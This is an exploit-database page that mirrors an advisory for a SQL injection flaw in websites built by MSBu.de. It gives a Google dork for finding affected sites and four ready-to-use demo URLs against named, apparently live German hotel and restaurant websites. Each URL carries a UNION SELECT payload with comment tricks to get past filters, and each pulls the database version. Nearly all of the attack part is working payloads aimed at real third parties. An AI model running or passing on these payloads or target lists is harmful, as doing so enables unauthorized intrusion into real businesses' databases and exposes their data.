Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023010042

Below is a copy:

Website by MSBu.de - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Website by MSBu.de - Sql Injection Vulnerability
#Date: 2023-01-23
#Exploit Author: Behrouz Mansoori
#Google Dork: "Website by MSBu.de"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Website by MSBu.de"

### Demo :

https://www.kaiserhof-bad-bellingen.de/en/special-offers.php?id=-21097%27%20%23AAAA%0Aunion%20%23AAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+&page=

https://www.hirschen-staufen.de/aktuelles.php?id=11730%27%20%23AAAA%0Aunion%20%23AAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+&page=

https://www.rosenhof-badenweiler.de/news.php?id=18841%27%20%23AAAAA%0Aunion%20%23AAAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+

https://www.sonne-muenstertal.de/kontakt.php?id=-15168%27%20%23AAAA%0Aunion%20%23AAAA%0Aselect%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20--+


********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.